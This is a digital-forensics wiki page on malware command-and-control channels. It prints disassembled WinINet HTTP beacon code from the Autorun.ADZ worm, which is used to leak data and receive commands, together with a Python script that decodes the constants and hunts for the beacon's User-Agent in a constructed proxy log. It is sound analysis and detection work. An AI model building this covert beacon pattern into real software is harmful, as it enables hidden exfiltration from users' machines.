Category:Digital-Forensics/Computer-Forensics/Communication-Channels
Description
Most malware communicates with a remote host for one or more of the following tasks:
- check whether updates are available
- report to the attacker that the host has been infected
- receive external commands, and synchronize with other infected hosts through a Command & Control (C&C) server, for instance to launch a Denial of Service (DoS) attack
- leak data (e.g. passwords, credit card numbers, network architecture, confidential documents, ...)
This traffic is what the analyst can observe on the network and reconstruct from the binary. Let's review some of these control communication channels.
HTTP
Description
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
Steps
The code below is an extract from Worm:Win32/Autorun.ADZ; the original page linked the sample for download. The worm uses the WinINet API, so its C&C traffic is plain HTTP and the whole request can be reconstructed from the arguments pushed before each call. Throughout the listing ebx holds zero and is used wherever a NULL pointer or a zero flag is needed; the `cmp eax, ebx` after InternetOpenA is the check for a NULL handle.

Step | Functions |
---|---|
Create HTTP connection | InternetOpenA, InternetConnectA |
Build HTTP request | HttpOpenRequestA, HttpAddRequestHeadersA |
Send HTTP request | HttpSendRequestA |
Read response | InternetReadFile |

Create HTTP connection

dwAccessType 4 is INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY (use the system proxy settings, without auto-proxy discovery). The User-Agent passed to InternetOpenA is the hardcoded string "74978o6rpp6p19836n17n3p2pq0840o0", which is a good network indicator for this sample. dwService 3 is INTERNET_SERVICE_HTTP and nServerPort 50h is port 80. The C&C host name (szServerName) is read from a stack buffer, so it is filled in at run time and will not necessarily appear as a plain string in the binary; recover it from the code that writes that buffer, or dynamically.

```asm
.text:00403AF6 push ebx ; dwFlags
.text:00403AF7 push ebx ; lpszProxyBypass
.text:00403AF8 push ebx ; lpszProxy
.text:00403AF9 push 4 ; dwAccessType
.text:00403AFB push offset szAgent ; "74978o6rpp6p19836n17n3p2pq0840o0"
.text:00403B00 call ds:InternetOpenA
.text:00403B06 mov [ebp+158h+var_180], eax
.text:00403B09 cmp eax, ebx
.text:00403B0B jz loc_403C6E
.text:00403B11 push ebx ; dwContext
.text:00403B12 push ebx ; dwFlags
.text:00403B13 push 3 ; dwService
.text:00403B15 push ebx ; lpszPassword
.text:00403B16 push ebx ; lpszUserName
.text:00403B17 push 50h ; nServerPort
.text:00403B19 lea ecx, [ebp+158h+szServerName]
.text:00403B1F push ecx ; lpszServerName
.text:00403B20 push eax ; hInternet
.text:00403B21 call ds:InternetConnectA
```

Build HTTP request

The request is a POST using HTTP/1.0, with no Referer and no Accept types. dwFlags 8468C200h decodes to INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS | INTERNET_FLAG_NO_UI: nothing is cached on disk, no cookies are sent or stored, redirects are not followed and no dialog can pop up, all of which keep the beacon quiet on the host. The headers built in the snipped code are then attached with HttpAddRequestHeadersA; dwModifiers 20000000h is HTTP_ADDREQ_FLAG_ADD.

```asm
.text:00403B32 push ebx ; dwContext
.text:00403B33 push 8468C200h ; dwFlags
.text:00403B38 push ebx ; lplpszAcceptTypes
.text:00403B39 push ebx ; lpszReferrer
.text:00403B3A push offset szVersion ; "HTTP/1.0"
.text:00403B3F lea ecx, [ebp+158h+szObjectName]
.text:00403B45 push ecx ; lpszObjectName
.text:00403B46 push offset szVerb ; "POST"
.text:00403B4B push eax ; hConnect
.text:00403B4C call ds:HttpOpenRequestA
[SNIP]
.text:00403B69 push 20000000h ; dwModifiers
.text:00403B6E push [ebp+158h+dwHeadersLength] ; dwHeadersLength
.text:00403B71 push eax ; lpszHeaders
.text:00403B72 push [ebp+158h+hInternet] ; hRequest
.text:00403B75 call ds:HttpAddRequestHeadersA
```

Send HTTP request

lpOptional (edi) points to the POST body and dwOptionalLength is its size; no additional headers are supplied at send time. The body is where the leaked data or the infection report travels, so this buffer is worth dumping when the sample is run under a debugger.

```asm
.text:00403C4F push [ebp+158h+dwOptionalLength] ; dwOptionalLength
.text:00403C52 push edi ; lpOptional
.text:00403C53 push ebx ; dwHeadersLength
.text:00403C54 push ebx ; lpszHeaders
.text:00403C55 push [ebp+158h+hInternet] ; hRequest
.text:00403C58 call ds:HttpSendRequestA
```

Read response

The server's answer (commands, update availability) is read into a heap buffer with InternetReadFile. Note that the frame offsets change from 158h to 148h: this read lives in a different function from the request setup above.

```asm
.text:00403FA4 lea ecx, [ebp+148h+dwNumberOfBytesRead]
.text:00403FA7 push ecx ; lpdwNumberOfBytesRead
.text:00403FA8 push [ebp+148h+lpOptional] ; dwNumberOfBytesToRead
.text:00403FAB mov [ebp+148h+lpMem], eax
.text:00403FAE push eax ; lpBuffer
.text:00403FAF push [ebp+148h+hInternet] ; hFile
.text:00403FB2 call ds:InternetReadFile
```
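The two things an analyst wants from the listing above are readable names for the raw immediates (dwAccessType, dwService, dwFlags, dwModifiers) and a way to find the resulting request profile in network logs. The script below does both. It is an added example written for this page, not code from the worm or from the wiki; the constant values are those of wininet.h, and the proxy log format, the host names and the addresses in it are constructed for the example.

```python
"""Decode the WinINet constants seen in the Autorun.ADZ listing and hunt for
the resulting HTTP request profile in a proxy log.

Added example for this page, not code from the worm or the wiki.  Constant
values are those of wininet.h; the log format and every log line below are
constructed for the example.
"""
import re

# dwAccessType values for InternetOpen (wininet.h)
INTERNET_OPEN_TYPE = {
    0: "INTERNET_OPEN_TYPE_PRECONFIG",
    1: "INTERNET_OPEN_TYPE_DIRECT",
    3: "INTERNET_OPEN_TYPE_PROXY",
    4: "INTERNET_OPEN_TYPE_PRECONFIG_WITH_NO_AUTOPROXY",
}
# dwService values for InternetConnect
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
# dwFlags bits for HttpOpenRequest (subset that matters for HTTP)
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
# dwModifiers bits for HttpAddRequestHeaders
HTTP_ADDREQ_FLAGS = {
    0x80000000: "HTTP_ADDREQ_FLAG_REPLACE",
    0x40000000: "HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA",
    0x20000000: "HTTP_ADDREQ_FLAG_ADD",
    0x10000000: "HTTP_ADDREQ_FLAG_ADD_IF_NEW",
    0x01000000: "HTTP_ADDREQ_FLAG_COALESCE_WITH_SEMICOLON",
}


def decode_bitmask(value, table):
    """Split a dwFlags immediate into named flags, highest bit first.
    Bits that no entry of the table explains are reported as UNKNOWN rather
    than silently dropped, so a new or mis-identified flag is not missed."""
    names, rest = [], value
    for bit in sorted(table, reverse=True):
        if rest & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append("UNKNOWN_0x%08X" % rest)
    return names


# What the call sequence puts on the wire: POST, HTTP/1.0, port 80, no
# Referer, no cookies, and this hardcoded User-Agent (from the listing).
HARDCODED_UA = "74978o6rpp6p19836n17n3p2pq0840o0"

# Constructed proxy log: <client> <method> <url> <version> <status> "<user-agent>"
SAMPLE_LOG = """\
10.0.0.5 POST http://c2.example.invalid/gate.php HTTP/1.0 200 "74978o6rpp6p19836n17n3p2pq0840o0"
10.0.0.7 GET http://www.example.com/ HTTP/1.1 200 "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
10.0.0.9 POST http://update.example.com/check HTTP/1.0 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.9 POST http://203.0.113.10/p.php HTTP/1.0 404 "x7f2"
"""
LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<version>HTTP/\d\.\d) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def find_beacons(log_text, ua=HARDCODED_UA):
    """Return (client, url, reason) for each request matching the worm's profile.

    An exact User-Agent match is a high-confidence indicator.  A POST over
    HTTP/1.0 from a non-browser User-Agent is a weaker heuristic meant to catch
    variants that only changed the agent string; review those hits manually.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format: skip rather than guess
        if m["ua"] == ua:
            hits.append((m["src"], m["url"], "hardcoded User-Agent"))
        elif m["method"] == "POST" and m["version"] == "HTTP/1.0" and not m["ua"].startswith("Mozilla/"):
            hits.append((m["src"], m["url"], "POST over HTTP/1.0 with non-browser User-Agent"))
    return hits


if __name__ == "__main__":
    print("InternetOpenA dwAccessType 4 ->", INTERNET_OPEN_TYPE[4])
    print("InternetConnectA dwService 3 ->", INTERNET_SERVICE[3])
    print("HttpOpenRequestA dwFlags 8468C200h ->", " | ".join(decode_bitmask(0x8468C200, INTERNET_FLAGS)))
    print("HttpAddRequestHeadersA dwModifiers 20000000h ->", " | ".join(decode_bitmask(0x20000000, HTTP_ADDREQ_FLAGS)))
    for hit in find_beacons(SAMPLE_LOG):
        print("beacon:", *hit)
```

Run it as a script to see the decoded constants and the two hits in the sample log. The exact User-Agent is the indicator to push into proxy and IDS rules; the HTTP/1.0 POST heuristic is only a triage filter, since legitimate software occasionally produces the same shape.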
IRC
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
P2P
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.